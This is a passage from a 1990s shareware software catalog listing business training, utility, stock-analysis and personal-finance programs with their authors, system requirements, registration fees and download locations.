Inc. (Philip S. Will), 203-233-0705 + Version: 1.0 (03-28-94) + Needs: IBM PC, DOS 3.3 or better. 520k RAM; EGA monitor; Hard + disk. + Registration fee: $21.50 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6). + Look for: HOI10A.EXE on BBSs (multiple files) (call 718-837-3236 + to download it at no charge); HOI.EXE on CompuServe in + CIS:PCAPP forum LIBrary 0 (or contact userID 74650,3623 for + assistance). + SWREG#: 2342 + PsL#: 11236 + Download size: 690k (about 51 minutes with a 2400 baud modem) + Description: + An invaluable tool for recording and organizing personal or + business property data for insurance, tax, or maintenance + purposes. Includes inventory, insurance, business, and claim + information. Prepare claims including overhead and profit + calculations. Record warranty information. Track insurance + expirations, premiums, and monthly costs. Add notes to items, + claims, claim items, businesses, and dates. Mouse support, + color editing, redundant help systems. + + + Product: ListBuilder + Contact manager for building a Network. See full description + on page 140. + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 126. + + Product: Paper Route Ledger + Computer bookkeeping for newspaper carriers. See full + description on page 256. + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 309. + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 226. + + Chapter 7, "Business" 312 + + + + Product: Rockford! + Design business cards in Windows. See full description on + page 191. + + + 7.14 Training & support aids + + See also: Computer programming, Hypertext/hypermedia; + Education, Computers. + + Product: Crossword Clipper for DOS + Crossword puzzle layout/publishing tool. See full description + on page 187. + + Product: Crossword Clipper for Windows + Crossword puzzle layout/publishing tool. See full description + on page 188. + + Product: Crossword Creator + Multi-lingual crossword puzzle editor. See full description on + page 447. + + Product: LEADING AND MANAGING OTHERS + Author: Chatfield Software, Inc. (Hale Chatfield), 216-632-5447 + Version: 1.0 (09-19-94) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; Hard disk; + Mouse; sound card. MPC-compatible sound card. + Registration fee: $22.00 + Registration benefits: 31/2" master disk(s); lifetime unlimited + tollfree 800# phone, mail support; 1-month return policy; bonus + utilities; all ASP-wide offers (see page 6); discounts on other + products. 12-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: CSLMO.ZIP on BBSs; CSLMO.ZIP on CompuServe in CIS:IBM + APPS forum LIBrary 7 (or contact userID 71031,1036 for + assistance); CSLMO.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 705k (about 53 minutes with a 2400 baud modem) + Description: + A multimedia seminar on disk for leaders and managers at all + levels. Includes basic instruction in leadership and management + - plus "how-to" features, automatically scored quizzes, a self- + assessment, readings, and much more. + + + Product: Notice Board + Notice board/information system for LANs. See full description + on page 371. + + Chapter 7, "Business" 313 + + + + Product: QA Study Aid + Author: Quid Pro Quo Software (Hal Endresen), 319-378-9140 + Version: 5.3 (10-14-95) + Needs: IBM PC, DOS 3.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. An ASCII editor program such as EDIT + (included with DOS 5.0 & later). + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $20.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; 3 months of + unlimited phone, CompuServe, mail support; discounts on + upgrades. 1-month free upgrading allowed. + Look for: QASA??.ZIP on BBSs (call 509-946-9848 to download it at + no charge); QASA??.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 11 (or contact userID 73760,2032 for assistance). + SWREG#: 502 + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + A computer-based test creation and execution system. Test + databases of questions/answers are created with external editor + using easy rules. Has compiler and test interpreter, presents + compiled test, scores all answers and can record results in a + score file. All data encrypted or password protected. Scores + may be exported. Supports all question types but essay. Can + create random subsets. Has weighting, letter grade relations, + correct answer display with help, review/correct mode, more. + + + 7.14.1 Lecturing & slide shows + + See also: Writing applications, Creativity & brainstorming; + Graphics, Presentation graphics. + + Product: Lecture + Author: Barn Owl Software, 618-632-7345 + Version: 1.02 (12-14-92) + Needs: IBM AT (80286), Windows 3.0 or better. Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $29.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + newsletter, mail support; 1-month return policy; all ASP-wide + offers (see page 6); discounts on other products. + Look for: LECT-102.ZIP on BBSs (call 618-632-2339 to download it + at no charge); LECTUR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 74017,1344 for assistance); + + Chapter 7, "Business" 314 + + + + LECTR100.ZIP on GEnie in IBMPC forum LIBrary 1 (or contact + userID R.ROSENBERGE for assistance). + SWREG#: 834 + PsL#: 10562 + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + Provides a much-needed text-based lecturing capability in + Windows. Replaces transparencies and foils! Other + presentation packages focus on graphics and overwhelm users + with complexities and high price tags. This program reads + standard ASCII files and displays text presentations in a + window. Mouse support lets you walk around freely as you "flip + slides." + + College teachers, businessmen, Toastmasters, and many others + who give text-based lectures will find this program extremely + useful. + + + Product: Prompter - Speaker's Utility + Author: OsoSoft (George Campbell), 805-528-1759 + Version: 1.2 (06-11-93) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; VGA monitor; + Mouse; VBRUN300.DLL. + Registration fee: $25.00 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited tollfree 800# phone, fax, BBS, CompuServe, + mail support; lifetime return policy; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: PROMPTER.ZIP on BBSs (call 805-528-3753 to download it + at no charge); PRMPTR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 0 (or contact userID 71571,222 for assistance). + Download size: 57k (about four minutes with a 2400 baud modem) + Description: + A complete speech editor and prompter for Windows. Create, + rehearse and deliver speeches and lectures just like the + professionals do. Any key pauses and restarts scrolling. Adjust + scroll rate while you speak. Elapsed time and estimated time + displays. Print speeches, too. Any font, any size, any scroll + rate. + + + 7.14.2 "Help desk" applications + + See also: Computer programming, Programming utilities, Desktop + tools for programmers. + + Product: DeskTop Advisor(R) + Create/browse popup hypertext w/images, sound. See full + description on page 408. + + Chapter 7, "Business" 315 + + + + 7.15 Simulators & what-ifs + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 162. + + Product: WALL STREET RAIDER + Stock market/corporate takeover simulation. See full + description on page 621. + + + 7.16 Business utilities + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 134. + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 159. + + Product: Cards+More + Labels and cards printing. See full description on page 481. + + Product: DARN! Don't Forget! + Events Reminder for Windows. See full description on page 135. + + Product: DataBrowser + Flexible database searching/viewing utility. See full + description on page 233. + + Product: DAYO SMART REPORTS + `Smart' reports & routines for DAYO. See full description on + page 321. + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 342. + + Chapter 7, "Business" 316 + + + + Product: Electronic Postal Window(tm) + Author: EmmaSoft Software Company, Inc., 607-533-4685 + Version: 1.6 (07-09-95) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM; Mouse. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited BBS, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; all ASP- + wide offers (see page 6); discounts on upgrades. + Look for: EPW15.ZIP on BBSs (call 607-533-7072 to download it at + no charge); EPW16.ZIP on CompuServe in CIS:USEN forum LIBrary + 10 (or contact userID 71333,1577 for assistance). + Download size: 507k (about 38 minutes with a 2400 baud modem) + Description: + US postal rates look-up program. Enter the weight of your + mailing piece and the postage is automatically displayed. All + classes of mail. Comparison feature shows most economical + postage. Country lookup for foreign mailings. Fun facts about + the Postal Service. + + + Product: EXPRESSGRAPH + Pie, line, bar charts for business apps. See full description + on page 499. + + Product: Fixed Asset Pro + Comprehensive fixed asset depreciation system. See full + description on page 255. + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 118. + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 226. + + Product: QRead + Read any text file w/ font sizing in Win 3.1. See full + description on page 50. + + Product: QRead for Windows 95 + Read any text file w/ font sizing. See full description on + page 50. + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 277. + + Chapter 7, "Business" 317 + + + + Product: WinUpD8R + Work/home file transfer/update/backup utility. See full + description on page 21. + + Product: Zip Express + Author: Insight Software Solutions, Inc. (Michael D. Jones), + 801-295-1890 + Version: 1.1 (02-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. 4000k RAM; Hard + disk; Mouse. + Registration fee: $39.95 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, fax, mail support. + Look for: ZIPEX110.ZIP on BBSs; ZIPEX.ZIP on CompuServe in + CIS:UKSHARE forum LIBrary 4 (or contact userID 71672,3464 for + assistance). + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + Zip Express v1.1 [ASP] is a utility allowing easy look up + of U.S. Zip Codes and their associated cities, states, + counties, area codes, time zones and current time. Search by + Zip, City, County, State or Area code. Auto paste data in any + format into applications or the clipboard via assignable hot + keys. Build your own pasting formats. Copy entire ranges of zip + code data to the clipboard of printer. MORE! + + + Product: Zippidy Do Da(tm) + Zipcode/areacode lookup tool with time info. See full + description on page 245. + + 7.16.1 Weights & measurements + + See also: Utilities, Desktop utilities, Calculators; Finances, + Financial calculators. + + Chapter 7, "Business" 318 + + + + Product: Convert It!(tm) SE + Author: SMI Corporation, 918-241-2301 + Version: 3.0b (03-17-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; Hard disk. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: CV302.ZIP on BBSs (call 918-747-2542 to download it at + no charge); CONVIT.ZIP on CompuServe in CIS:WINPROD forum + LIBrary 6 (or contact userID 72644,2335 for assistance). + SWREG#: 5108 + Download size: 324k (about 24 minutes with a 2400 baud modem) + Description: + Unit of measure conversion utility for MS Windows. 15 groups of + conversions with one more for custom conversions. You can edit + the conversion factors, add or delete units. Customize it for + the way YOU work. Turn conversion groups off/on. You can even + turn off/on individual conversion factors! Conversions include: + temperature, velocity, density, money, power, force, distance, + and more. On-line context sensitive help. In use by many + Fortune 500, FedGov, NASA and many others. + + + Product: Intelliship + Author: Intelliware, 310-696-2222 + Version: 6.5 (05-01-96) + Needs: IBM 80386, DOS 3.3 or better. 1024k RAM; Hard disk; XMS + memory. + Strongly recommended: HP LaserJet printer; Mouse; Epson + printer. + Registration fee: $60.00 (add $4.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; 31/2" master + disk(s); 6 months of unlimited phone, fax, CompuServe, mail + support; 1-month return policy; runtime license; registration + commissions. 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs. + Download size: 800k (about 60 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Automatically calculates rates & zones and prints shipping + labels, COD tags, and the UPS Shipping Manifest. This system + includes the 1996 rates & zones and can integrate with shipping + weigh scales with RS-232 output. It is UPS accepted at the + national level. The author can customize it to print the + shipping label on any shipping label printer (standard or + thermal). + + Chapter 7, "Business" 319 + + + + 7.16.2 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: AsciiConvert + ASCII File Converter. See full description on page 44. + + + 7.17 Software tools & add-ins + + 7.17.1 For multiple programs + + Product: QUIK-INSTALL + 7k application install program! Many features. See full + description on page 413. + + Product: SeekWell Universal Query + Universal database query, labels, bar codes. See full + description on page 142. + + 7.17.2 For other + + Product: DAYO INDEX + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOXE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOXE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Designed to manage the indexing of the DAYO databases. DAYO + applications all have multiple indexes, and because it is + recommended that they be reindexed at least once daily, this + was created to simplify this process. + + Chapter 7, "Business" 320 + + + + Product: DAYO PASSWORDS + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. DAYO modules. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOIDE.EXE on BBSs (call 407-292-4921 to download it + at no charge); DAYIDE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Provides DAYO Business Application users with a system of + database security through the use of passwords. Its use is + optional, but recommended in areas where more than one person + has access to the data. + + + 7.18 Other + + Product: DAYO SMART REPORTS + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.51+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $75.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYORE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYORE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Contains many reports/routines that will help you manage your + purchasing, inventory, invoices, backorders, sales, and your + databases. There are many reports, lists and routines included + in smart reports, ie: single warehouse, valuation expanded, + reorder, late PO, margin (history), vendor list, customer list, + inventory item list, expenses list, warehouse adjustments, HP + + Chapter 7, "Business" 321 + + + + laser pull sheet, available inventory, GL posting problems, + view reports on screen, and many more! + + Chapter 8, "Finances" 322 + + + + + + Chapter 8 + Finances + + See also: Spreadsheet applications; Mathematics; Business. + + + 8.1 Stock trading & analysis + + Product: Capital Gainz + Investment portfolio manager. See full description on + page 335. + + Product: Capital Gainz for Windows + Investment portfolio manager. See full description on + page 336. + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 342. + + Product: THE FEELING'S MUTUAL-DOS + Mutual fund database/investment analysis. See full description + on page 326. + + Product: THE FEELING'S MUTUAL-Macintosh + Mutual fund database/financial planner. See full description + on page 327. + + Product: THE FEELING'S MUTUAL-WINDOWS + Mutual fund database/financial planner. See full description + on page 327. + + Product: PC Chart + Author: Guru Systems Ltd. (Gene Quong), 604-299-1010 + Version: V1.5 (07-15-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Hayes-compatible modem. + Registration fee: $99.00 (add $7.00 for shipping to U.S. + addresses) (add $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + GEnie, newsletter, mail support; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs; PCE15.ZIP on CompuServe + in CIS:INVFORUM forum LIBrary 3 (multiple files) (or contact + userID 72717,1651 for assistance); PCC15.ZIP on GEnie in INVEST + + Chapter 8, "Finances" 323 + + + + forum LIBrary 3 (multiple files) (or contact userID G.QUONG for + assistance). + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + An integrated technical analysis program that combines + charting, database and telecommunications capabiltities. + Generates stock charts and standard technical indicators such + as moving averages, RSI and Money Flow. Built-in + telecommunication capabilities can be used to download + historical, end-of-day, and intraday prices from CompuServe, + Dial/Data and GEnie. Supports PC Chart, ASCII and CSI data + formats and up to 400 files in one subdirectory. + + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 330. + + Product: Portfolio Manager + Powerful record system for your investments. See full + description on page 337. + + Product: StockQuest + Author: Informatik Inc., 610.640.0339 + Version: 2.10 (07-25-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; STCKWZ.ZIP on CompuServe + in CIS:INVFORUM forum LIBrary 1 (or contact userID 76534,1166 + for assistance). + SWREG#: 6323 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Multi-dimensional stock price analyser. Using earnings, + growth, term and yield target, system calculates fundamental + stock values. "What-if" calculations. Easy to use. Shows + detail of underlying calculation. An essential tool for + validating stock investment and trading decisions. + + Chapter 8, "Finances" 324 + + + + Product: Total Investor for 1-2-3 DOS + Author: Hughes Financial Services, 201-895-5665 + Version: 2.1 (11-12-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor. Lotus + 1-2-3 version 2.0 or later; Quattro Pro. + Registration fee: $35.00 + Registration benefits: 51/4" master disk(s); 3 months of phone, + CompuServe support; bonus data. + Look for: TI123.ZIP on BBSs (call 312-280-8565 to download it at + no charge); TI123.ZIP on CompuServe in CIS:LOTUS forum LIBrary + 2 (or contact userID 76057,2400 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An integrated portfolio management and technical analysis + template for Lotus 1-2-3 and Quattro Pro. Keeps track of + securities, charts price trends, and makes buy/sell decisions + based on technical indicators. These indicators include moving + averages, relative strength, momentum, RSI, and many others. + Total Investor maintains both current and historical quotes. + Can be linked to Compuserve, Prodigy, DJN/R, Genie and Signal. + + + Product: Total Investor for 1-2-3 Window + Portfolio management and charting for 1-2-3. See full + description on page 217. + + Product: Total Investor for Symphony + Author: Hughes Financial Services, 201-895-5665 + Version: 2.1 (09-10-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor; Modem. + Lotus Symphony version 1.1 or later. + Strongly recommended: EMS memory. + Registration fee: $50.00 + Registration benefits: 51/4" master disk(s); 3 months of phone, + CompuServe support; bonus data. + Look for: TISYM.ZIP on BBSs (call 312-280-8565 to download it at + no charge); TISYM.ZIP on CompuServe in CIS:LOTUS forum LIBrary + 6 (or contact userID 76057,2400 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + An integrated portfolio management and technical analysis + template for Lotus Symphony. Can be used to keep track of + securities, chart stocks, and make buy/sell decisions based on + technical indicators. These indicators include moving averages, + momentum, relative strength, RSI, and many others. Updates both + current quotes for your portfolio and historical quotes for + charting and analysis through Dow Jones News Retrieval. + + + Product: Variable Investment Analyst + Comprehensive investment portfolio management. See full + description on page 338. + + Chapter 8, "Finances" 325 + + + + Product: Wall Street Simulator - Windows + Author: Larax Software + Version: 1.00 (06-25-94) + Needs: IBM 80386, Windows 3.0 or better. 640k RAM; EGA monitor; + Dual 720k floppy drives; VBRUN300.DLL. + Strongly recommended: VGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Postscript printer; Mouse; Epson + printer; EMS memory; XMS memory. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited CompuServe, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 1-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; WSSW10.ZIP on CompuServe + in CIS:INVFOR forum LIBrary 0 (or contact userID 73577,115 for + assistance). + SWREG#: 2838 + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + Realistic simulation of a brokerage account. Allows trades to + be made using real market prices. Analyze results and compare + to other registered users. + + + 8.2 Personal finances + + See also: Business, Business finances. + + Product: THE FEELING'S MUTUAL-DOS + Author: Interpretive Software Inc. (Stu James), 804-979-0245 + Version: 3.1.93 (04-01-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; CGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Epson printer. + Registration fee: $60.00 (add $2.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); lifetime unlimited phone, fax, CompuServe, newsletter, + mail support; 1-month limited return policy; bonus data; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; TFM393.ZIP on CompuServe + in CIS:INVESTORS forum LIBrary 5 (or contact userID 70401,2062 + for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Provides a straight-forward presentation of mutual fund + investment alternatives. Designed for investors of all levels + of experience. Search for funds which meet given criteria or + + Chapter 8, "Finances" 326 + + + + your personal profile. Includes risk and load adjusted + analysis. Detailed information on over 150 funds (800 in + expanded version). Comes with on-line help, newsletter, + references, sample projections and fund family information. + + + Product: THE FEELING'S MUTUAL-Macintosh + Author: Interpretive Software Inc. (Stu James), 804-979-0245 + Version: 3.1.93 (04-15-94) + Needs: Macintosh, System 6.0.0 or better. 1000k RAM. Macintosh + Plus or better. + Strongly recommended: Hard disk. + Registration fee: $60.00 (add $2.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited phone, fax, CompuServe, newsletter, mail support; + 1-month limited return policy; bonus data; all ASP-wide offers + (see page 6); discounts on other products; discounts on + upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs. + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Provides a straight-forward presentation of mutual fund + investment alternatives. Designed for investors of all levels + of experience. Search for funds which meet given criteria or + your personal profile. Includes risk and load adjusted + analysis. Detailed information on over 150 funds (800 in + expanded version). Includes on-line help, newsletter, + references, sample projections and fund family information. + + + Product: THE FEELING'S MUTUAL-WINDOWS + Author: Interpretive Software Inc. (Stu James), 804-979-0245 + Version: 3.1.93 (04-01-94) + Needs: IBM PC, Windows 3.0 or better. 2000k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse; Epson printer; XMS memory. + Registration fee: $60.00 (add $2.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); lifetime unlimited phone, fax, CompuServe, newsletter, + mail support; 1-month limited return policy; bonus data; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; TFM393.ZIP on CompuServe + in CIS:INVESTORS forum LIBrary 5 (or contact userID 70401,2062 + for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Provides a straight-forward presentation of mutual fund + investment alternatives. Designed for investors of all levels + of experience. Search for funds which meet given criteria or + + Chapter 8, "Finances" 327 + + + + your personal profile. Includes risk and load adjusted + analysis. Detailed information on over 150 funds (800 in + expanded version). Includes on-line help, newsletter, + references, sample projections and fund family information. + + + Product: Financial Analysis For Windows + Author: Gjetaas, Inc. (Russell C. Anderson), 360-599-2418 + Version: 4.30 (03-26-96) + Needs: IBM 80386, Windows 3.1 or better. 4k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, CompuServe support; 1-month + return policy; discounts on upgrades. + Look for: WINFIN*.ZIP on BBSs; WINFIN.ZIP on CompuServe in + CIS:INVFORUM forum LIBrary 2 (or contact userID 70135,1052 for + assistance). + SWREG#: 1627 + PsL#: 20337 + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + * Mortgage & rule-78 with amortization + * Bonds, bond ladder, T-bills, CDs, BAs + * Black-Scholes options with ability to calc implied + volitility + * Portfolio hedge - buy an index put to protect your stocks + * IRR, MIRR, NPV with 1,900+ cash flows allowed + * Retirement planning: payout increases each year w/ + inflation + * Auto lease- select variable to solve + * Days between dates arithmetic, 50 year calendar + * Random number generator + * Plain vanilla: annuity & compound interest + + Chapter 8, "Finances" 328 + + + + Product: Home Refinancing + Author: ProDomus, Inc. (Philip S. Will), 203-233-0705 + Version: 1.2 (03-21-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $34.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: HOMRF10A.ZIP on BBSs (multiple files) (call + 718-837-3236 to download it at no charge); HOMRF.ZIP on + CompuServe in CIS:PCAPP forum LIBrary 4 (or contact userID + 74650,3623 for assistance). + SWREG#: 1718 + PsL#: 11237 + Download size: 552k (about 41 minutes with a 2400 baud modem) + Description: + Will refinancing save money? This caculates the acutal and + time value amount of savings or loss. Points may be + capitalized. Bonus calculators show alternative payment options + (any number of periods per year, payments in advance or + arrears) and amortization schedules with amounts for principal + and interest for the life of the loan and each year. Options + may be saved and printed. Mouse support, DOS GUI (graphical) + or text mode. Multiuser. + + + Product: LAPC - Loan Advisor for the PC + Author: J.D. Consulting Associates, 518-482-5789 + Version: 2.3 (04-01-94) + Needs: IBM AT (80286), DOS 3.0 or better. 480k RAM; CGA monitor; + Hard disk; Epson printer. + Strongly recommended: VGA monitor; HP LaserJet printer. + Registration fee: $19.95 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, mail support; 1-month limited + return policy; bonus utilities; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products; + discounts on upgrades. 1-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs. + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + Performs loan calculations for any type of fixed rate loan from + one to 50 yrs. It will calculate remaining principle, payoff + effect of principle prepayments and total interest charges. + LAPC is designed as a tool for loan management and for + + Chapter 8, "Finances" 329 + + + + comparing various loan parameters for choosing the best + alternative. + + + Product: Money Math for Windows + Financial analysis mathematical tools. See full description on + page 250. + + Product: Personal Finances 2 + Author: Spitfire Software, 404-257-0187 + Version: 4.02h (01-12-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Hard disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, newsletter, + mail support; all ASP-wide offers (see page 6); discounts on + other products; discounts on upgrades. 3-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: PF2-*.ZIP on BBSs (multiple files) (call 404-419-0888 + to download it at no charge); PF2.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 4 (or contact userID 73577,442 for + assistance). + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + A full function personal and small business financial system + for DOS. It supports all types of accounts-checking, credit + card, stock margin, etc. It has integrated subsystems for + multi-year budgeting, accounts pay/rcv, fixed assets/home + inventory, and financial investments. PF2 